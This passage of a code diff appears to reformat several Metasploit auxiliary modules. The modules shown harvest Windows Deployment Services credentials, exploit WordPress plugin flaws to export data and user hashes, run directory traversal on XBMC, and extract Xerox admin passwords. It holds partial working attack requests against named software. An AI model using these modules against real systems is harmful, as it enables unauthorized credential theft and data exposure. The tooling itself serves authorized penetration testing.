'Indent' => 1,
'Header' => 'vBulletin Users',
'Indent' => 1,
'Columns' => ['Username', 'Password Hash', 'Salt']
)
@@ -215,6 +217,4 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
modules/auxiliary/gather/windows_deployment_services_shares.rb
+26 -29
View File
@@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
@@ -13,39 +12,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer',
'Description' => %q{
This module will search remote file shares for unattended installation files that may contain
domain credentials. This is often used after discovering domain credentials with the
auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
have domain credentials. This module will connect to the RemInst share and any Microsoft
Deployment Toolkit shares indicated by the share name comments.
},
'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
'License' => MSF_LICENSE,
'References' =>
[
},
'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'],
[ 'URL', 'http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html'],
],
))
)
)
register_options(
[
Opt::RPORT(445),
OptString.new('SMBDomain', [ false, "SMB Domain", '']),
])
]
)
end
# Determine the type of share based on an ID type value
def share_type(val)
stypes = %W{ DISK PRINTER DEVICE IPC SPECIAL TEMPORARY }
stypes = %W{DISK PRINTER DEVICE IPC SPECIAL TEMPORARY}
stypes[val] || 'UNKNOWN'
end
# Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC
# and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed!
def srvsvc_netshareenum
@@ -61,10 +61,10 @@ class MetasploitModule < Msf::Auxiliary
stubdata =
NDR.uwstring("\\\\#{rhost}") +
NDR.long(1) #level
NDR.long(1) # level
ref_id = stubdata[0,4].unpack("V")[0]
ctr = [1, ref_id + 4 , 0, 0].pack("VVVV")
ref_id = stubdata[0, 4].unpack("V")[0]
ctr = [1, ref_id + 4, 0, 0].pack("VVVV")
stubdata << ctr
stubdata << NDR.align(ctr)
@@ -83,11 +83,11 @@ class MetasploitModule < Msf::Auxiliary
end
# Level, CTR header, Reference ID of CTR
res.slice!(0,12)
res.slice!(0, 12)
share_count = res.slice!(0, 4).unpack("V")[0]
# Reference ID of CTR1
res.slice!(0,4)
res.slice!(0, 4)
share_max_count = res.slice!(0, 4).unpack("V")[0]
if share_max_count != share_count
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary
end
# ReferenceID / Type / ReferenceID of Comment
types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]}
types = res.slice!(0, share_count * 12).scan(/.{12}/n).map { |a| a[4, 2].unpack("v")[0] }
share_count.times do |t|
length, offset, max_length = res.slice!(0, 12).unpack("VVV")
@@ -109,20 +109,20 @@ class MetasploitModule < Msf::Auxiliary
end
name = res.slice!(0, 2 * length)
res.slice!(0,2) if length % 2 == 1 # pad
res.slice!(0, 2) if length % 2 == 1 # pad
comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV")
if comment_offset != 0
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment offset was not zero")
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment offset was not zero")
end
if comment_length != comment_max_length
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment max length was not length")
fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} share comment max length was not length")
end
comment = res.slice!(0, 2 * comment_length)
res.slice!(0,2) if comment_length % 2 == 1 # pad
res.slice!(0, 2) if comment_length % 2 == 1 # pad
shares << [ name, share_type(types[t]), comment]
end
@@ -151,7 +151,6 @@ class MetasploitModule < Msf::Auxiliary
deploy_shares.each do |deploy_share|
query_share(deploy_share)
end
rescue ::Interrupt
raise $!
end
@@ -186,11 +185,9 @@ class MetasploitModule < Msf::Auxiliary
print_good("Credentials: " +
"Path=#{share_path}#{file_path} " +
"Username=#{cred['domain'].to_s}\\#{cred['username'].to_s} " +
"Password=#{cred['password'].to_s}"
)
"Password=#{cred['password'].to_s}")
end
end
end
def report_cred(opts)
@@ -220,7 +217,6 @@ class MetasploitModule < Msf::Auxiliary
end
def parse_client_unattend(data)
begin
xml = REXML::Document.new(data)
rescue REXML::ParseException => e
@@ -232,6 +228,7 @@ class MetasploitModule < Msf::Auxiliary
def loot_unattend(data)
return if data.empty?
path = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services")
print_good("Stored unattend.xml in #{path}")
end
modules/auxiliary/gather/wp_all_in_one_migration_export.rb
+22 -20
View File
@@ -8,31 +8,32 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress All-in-One Migration Export',
'Description' => %q{
This module allows you to export Wordpress data (such as the database, plugins, themes,
uploaded files, etc) via the All-in-One Migration plugin without authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'WordPress All-in-One Migration Export',
'Description' => %q{
This module allows you to export Wordpress data (such as the database, plugins, themes,
uploaded files, etc) via the All-in-One Migration plugin without authentication.
},
'License' => MSF_LICENSE,
'Author' => [
'James Golovich', # Disclosure
'rastating' # Metasploit module
'rastating' # Metasploit module
],
'References' =>
[
'References' => [
['WPVDB', '7857'],
['URL', 'https://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability']
],
'DisclosureDate' => '2015-03-19'
))
'DisclosureDate' => '2015-03-19'
)
)
register_options(
[
OptInt.new('MAXTIME', [ true, 'The maximum number of seconds to wait for the export to complete', 300 ])
])
]
)
end
def check
@@ -43,11 +44,12 @@ class MetasploitModule < Msf::Auxiliary
print_status("Requesting website export...")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_get' => { 'action' => 'router' },
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'vars_get' => { 'action' => 'router' },
'vars_post' => { 'options[action]' => 'export' }
}, datastore['MAXTIME'])
}, datastore['MAXTIME']
)
unless res
fail_with(Failure::Unknown, "#{peer} - No response from the target")
modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb
+20 -20
View File
@@ -10,28 +10,28 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Ultimate CSV Importer User Table Extract',
'Description' => %q{
Due to lack of verification of a visitor's permissions, it is possible
to execute the 'export.php' script included in the default installation of the
Ultimate CSV Importer plugin and retrieve the full contents of the user table
in the WordPress installation. This results in full disclosure of usernames,
hashed passwords and email addresses for all users.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'WordPress Ultimate CSV Importer User Table Extract',
'Description' => %q{
Due to lack of verification of a visitor's permissions, it is possible
to execute the 'export.php' script included in the default installation of the
Ultimate CSV Importer plugin and retrieve the full contents of the user table
in the WordPress installation. This results in full disclosure of usernames,
hashed passwords and email addresses for all users.
},
'License' => MSF_LICENSE,
'Author' => [
'James Hooker', # Disclosure
'rastating' # Metasploit module
'rastating' # Metasploit module
],
'References' =>
[
'References' => [
['WPVDB', '7778']
],
'DisclosureDate' => '2015-02-02'
))
'DisclosureDate' => '2015-02-02'
)
)
end
def plugin_url
@@ -89,8 +89,8 @@ class MetasploitModule < Msf::Auxiliary
def run
print_status("Requesting CSV extract...")
res = send_request_cgi(
'method' => 'POST',
'uri' => exporter_url,
'method' => 'POST',
'uri' => exporter_url,
'vars_post' => { 'export' => 'users' }
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+16 -21
View File
@@ -10,27 +10,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract',
'Description' =>
"The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
'Name' => 'WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract',
'Description' => "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements
and its results in files for fast access. Version 0.9.2.4 has been fixed afterwards
so it can be vulnerable. These cache files are in the webroot of the Wordpress
installation and can be downloaded if the name is guessed. This module tries to
locate them with brute force in order to find usernames and password hashes in these
files. W3 Total Cache must be configured with Database Cache enabled and Database
Cache Method set to Disk to be vulnerable",
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '88744'],
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/242'],
['WPVDB', '6621']
],
'Author' =>
[
'Christian Mehlmauer', # Metasploit module
'Jason A. Donenfeld <Jason[at]zx2c4.com>' # POC
]
'License' => MSF_LICENSE,
'References' => [
['OSVDB', '88744'],
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/242'],
['WPVDB', '6621']
],
'Author' => [
'Christian Mehlmauer', # Metasploit module
'Jason A. Donenfeld <Jason[at]zx2c4.com>' # POC
]
)
register_options(
@@ -38,7 +35,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TABLE_PREFIX', [true, 'Wordpress table prefix', 'wp_']),
OptInt.new('SITE_ITERATIONS', [true, 'Number of sites to iterate', 25]),
OptInt.new('USER_ITERATIONS', [true, 'Number of users to iterate', 25])
])
]
)
end
def table_prefix
@@ -58,13 +56,12 @@ class MetasploitModule < Msf::Auxiliary
user_url = normalize_uri(target_uri)
begin
send_request_cgi(
'uri' => user_url,
'method' => 'GET',
'uri' => user_url,
'method' => 'GET',
'vars_get' => {
'author' => user_id.to_s
}
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Unable to connect to #{user_url}")
rescue ::Timeout::Error, ::Errno::EPIPE
@@ -106,11 +103,9 @@ class MetasploitModule < Msf::Auxiliary
users_found = false
(1..site_iterations).each do |site_id|
vprint_status("Trying site_id #{site_id}...")
(1..user_iterations).each do |user_id|
vprint_status("Trying user_id #{user_id}...")
# used to cache the statement
modules/auxiliary/gather/xbmc_traversal.rb
+19 -17
View File
@@ -7,28 +7,29 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "XBMC Web Server Directory Traversal",
'Description' => %q{
def initialize(info = {})
super(
update_info(
info,
'Name' => "XBMC Web Server Directory Traversal",
'Description' => %q{
This module exploits a directory traversal bug in XBMC 11, up until the
2012-11-04 nightly build. The module can only be used to retrieve files.
},
'License' => MSF_LICENSE,
'Author' =>
[
2012-11-04 nightly build. The module can only be used to retrieve files.
},
'License' => MSF_LICENSE,
'Author' => [
'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton
'Lucas "acidgen" Lundgren IOActive',
'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
],
'References' =>
[
'References' => [
['URL', 'https://forum.kodi.tv/showthread.php?tid=144110&pid=1227348'],
['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'],
['URL', 'https://ioactive.com/pdfs/Security_Advisory_XBMC.pdf'],
],
'DisclosureDate' => '2012-11-04'
))
'DisclosureDate' => '2012-11-04'
)
)
register_options(
[
@@ -37,7 +38,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('DEPTH', [true, 'The max traversal depth', 9]),
OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'xbmc']),
OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'xbmc']),
])
]
)
end
def run
@@ -48,12 +50,12 @@ class MetasploitModule < Msf::Auxiliary
end
# Create request
traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep
traversal = "../" * datastore['DEPTH'] # The longest of all platforms tested was 9 deep
begin
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
}, 25)
rescue Rex::ConnectionRefused
print_error("#{rhost}:#{rport} Could not connect.")
modules/auxiliary/gather/xerox_pwd_extract.rb
+19 -16
View File
@@ -7,27 +7,30 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Xerox Administrator Console Password Extractor',
'Description' => %q{
This module will extract the management console's admin password from the
Xerox file system using firmware bootstrap injection.
},
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Xerox Administrator Console Password Extractor',
'Description' => %q{
This module will extract the management console's admin password from the
Xerox file system using firmware bootstrap injection.
},
'Author' => [
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
OptPort.new('RPORT', [true, 'Web management console port for the printer', 80]),
OptPort.new('JPORT', [true, 'Jetdirect port', 9100]),
OptInt.new('TIMEOUT', [true, 'Timeout to wait for printer job to run', 45])
])
OptInt.new('TIMEOUT', [true, 'Timeout to wait for printer job to run', 45])
]
)
end
def jport
@@ -47,10 +50,10 @@ class MetasploitModule < Msf::Auxiliary
if passwd
print_good("#{rhost}:#{jport} - Password found: #{passwd}")
loot_name = 'xerox.password'
loot_type = 'text/plain'
loot_name = 'xerox.password'
loot_type = 'text/plain'
loot_filename = 'xerox_password.text'
loot_desc = 'Xerox password harvester'
loot_desc = 'Xerox password harvester'
p = store_loot(loot_name, loot_type, datastore['RHOST'], passwd, loot_filename, loot_desc)
print_good("#{rhost}:#{jport} - Credentials saved in: #{p}")

Some files were not shown because too many files have changed in this diff Show More